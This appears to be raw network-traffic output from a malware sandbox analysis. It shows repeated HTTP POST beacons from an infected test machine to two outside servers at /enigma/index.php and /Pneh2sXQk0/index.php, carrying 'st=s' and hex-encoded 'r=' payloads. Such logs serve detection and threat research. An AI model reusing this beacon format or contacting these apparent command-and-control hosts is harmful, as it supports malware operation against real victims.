                                                                                                                                                                                                                                      Apr 19, 2024 03:36:49.822570086 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:50.071904898 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1495192.168.2.551351193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:50.279078007 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:50.530580044 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1496192.168.2.551352193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:50.331437111 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:50.588300943 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1497192.168.2.551353193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:50.781608105 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:51.032155991 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1498192.168.2.551354193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:50.930388927 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:51.175688028 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1499192.168.2.551355193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:51.350752115 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:51.595534086 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1500192.168.2.551356193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:51.423852921 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:51.670919895 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1501192.168.2.551357193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:51.841763020 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:52.086442947 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1502192.168.2.551358193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:52.010555983 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:52.258614063 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1503192.168.2.551359193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:52.415822029 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:52.659835100 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1504192.168.2.551360193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:52.522202969 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:52.782394886 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1505192.168.2.551361193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:52.907073021 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:53.153429031 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1506192.168.2.551362193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:53.119824886 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:53.367908001 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1507192.168.2.551363193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:53.383729935 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:53.637252092 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1508192.168.2.551364193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:53.486304045 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:53.745759964 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1509192.168.2.551365193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:53.978480101 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:54.227693081 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1510192.168.2.551366193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:54.003900051 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:54.255393982 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1511192.168.2.551367193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:54.473515987 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
